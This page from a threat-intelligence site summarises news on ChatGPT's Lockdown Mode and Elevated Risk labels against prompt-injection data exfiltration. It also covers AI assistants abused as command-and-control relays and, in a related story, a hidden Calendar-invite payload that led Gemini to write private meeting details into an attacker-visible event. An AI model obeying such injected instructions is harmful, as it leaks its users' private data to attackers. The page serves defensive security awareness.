Skip to main content
Mallory
Mallory

OpenAI Adds ChatGPT Lockdown Mode and Elevated Risk Labels to Reduce Prompt-Injection Exfiltration

prompt injectionchatgpt enterpriselockdown modechatgpt atlaschatgpt edudata exfiltrationprivacy concernselevated riskrole-based accessai assistantstool accessmicrosoft copilotbrowsing restrictions
Updated February 17, 2026 at 08:02 PM2 sources
OpenAI Adds ChatGPT Lockdown Mode and Elevated Risk Labels to Reduce Prompt-Injection Exfiltration

Get Ahead of Threats Like This

Know if you're exposed — before adversaries strike.

OpenAI introduced Lockdown Mode and Elevated Risk labels in ChatGPT to reduce exposure to prompt injection and related data-exfiltration risks when AI features interact with external systems. Lockdown Mode is positioned as an optional, advanced setting for higher-risk users and environments (notably ChatGPT Enterprise, Edu, for Healthcare, and for Teachers) that restricts tool access and limits how ChatGPT can reach outside systems; reported controls include disabling or constraining capabilities attackers could abuse via conversations or connected apps, and limiting browsing so that no live network requests leave OpenAI-controlled infrastructure (with browsing constrained to cached content). Admins can enable the setting via workspace controls and apply additional restrictions through dedicated roles, while Elevated Risk labels provide in-product warnings and guidance for features that increase risk when connecting to apps or the web, including across ChatGPT, ChatGPT Atlas, and Codex.

Separate research highlighted how AI assistants with web-browsing/URL-fetching features can be abused as stealthy command-and-control (C2) relays, demonstrating a technique against Microsoft Copilot and xAI Grok that tunnels operator commands and victim data through legitimate AI web interfaces and can work without an API key or registered account. In parallel, the European Parliament reportedly disabled built-in AI tools on lawmakers’ work devices due to cybersecurity and privacy concerns about uploading sensitive correspondence to third-party cloud AI providers and uncertainty about what data is shared and retained. Other referenced material focused on general productivity customization of ChatGPT via “Custom Instructions,” rather than a specific security event or disclosure.

Related Entities

Organizations

Affected Products

Related Stories

AI Chatbot Security Risks: Prompt Injection Data Exfiltration and Privacy Trade-offs in New Consumer Tiers

AI Chatbot Security Risks: Prompt Injection Data Exfiltration and Privacy Trade-offs in New Consumer Tiers

Researchers disclosed an **indirect prompt injection** technique against **Google Gemini** that used a malicious **Google Calendar invite** to bypass guardrails and exfiltrate private meeting details. By embedding a hidden natural-language payload in an event description, an attacker could cause Gemini—when later asked an innocuous scheduling question—to summarize a user’s private meetings and write that summary into a newly created calendar event; in many enterprise configurations, that new event could be visible to the attacker, enabling data theft without additional user interaction. The issue was reported as remediated after responsible disclosure, underscoring how AI assistants integrated with enterprise SaaS can create new cross-application data-extraction paths. Separately, OpenAI product rollouts raised enterprise data-handling concerns tied to consumer usage. **ChatGPT Go** (a low-cost tier) was described as introducing an **ad-supported** model that could increase exposure of conversation data and usage patterns to advertising ecosystems, amplifying “shadow AI” risk when employees use personal accounts for work. **ChatGPT Health** was positioned as a dedicated health experience with added protections (e.g., encryption/isolation and claims that user data is not used to train foundation models), but reporting highlighted unresolved questions around safety, privacy, and how sensitive health information is protected in practice—areas that may require additional governance and controls if employees adopt these tools outside approved enterprise channels.

1 months ago

AI Prompt Injection and Data Leakage Vulnerabilities in OpenAI's ChatGPT and Atlas Browser

Tenable Research has identified seven novel vulnerabilities and attack techniques in OpenAI's ChatGPT, including indirect prompt injections, exfiltration of user data, and bypasses of safety mechanisms in the latest GPT-5 model. These vulnerabilities allow attackers to manipulate the large language model (LLM) through crafted inputs, potentially leading to the theft of private information from user memories and chat histories, even when users simply interact with ChatGPT. The research highlights that hundreds of millions of users could be at risk, as attackers can exploit these weaknesses to bypass safeguards and extract sensitive data without user awareness. The release of OpenAI's ChatGPT Atlas, an AI-powered browser that remembers user activities and acts autonomously, further amplifies these concerns. Security experts warn that features such as persistent memory and autonomous actions increase the attack surface, making the browser susceptible to prompt injection and other AI-specific vulnerabilities. The implications for enterprise security and privacy are significant, as these AI-driven tools become more integrated into business processes, necessitating new approaches to identity management, access controls, and oversight to mitigate the risks posed by advanced AI-enabled attacks.

4 months ago
AI Feature Rollouts and Data-Handling Risks in Consumer and Developer Tools

AI Feature Rollouts and Data-Handling Risks in Consumer and Developer Tools

Mozilla said an upcoming *Firefox* release will add centralized controls to disable generative-AI capabilities, including a single **“Block AI enhancements”** toggle intended to prevent current and future AI features (and related prompts) from being enabled in the desktop browser. The controls are expected to allow per-feature management of AI functions such as translations, PDF image alt-text generation, AI-assisted tab grouping, link previews, and sidebar chatbot access. Separately, OpenAI announced product changes around its developer and ChatGPT ecosystems, including a Mac-only *Codex* app positioned as a multi-agent “command center” with sandboxing intended to limit file writes and network access, and plans to retire **GPT-4o** and several other ChatGPT models as usage shifts to **GPT-5.2**. In parallel, a security warning highlighted a report alleging two widely used AI coding assistants were **exfiltrating all ingested code to China**, underscoring the need for enterprise controls over AI developer tools, data residency, and code/IP handling.

1 months ago

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed — before adversaries strike.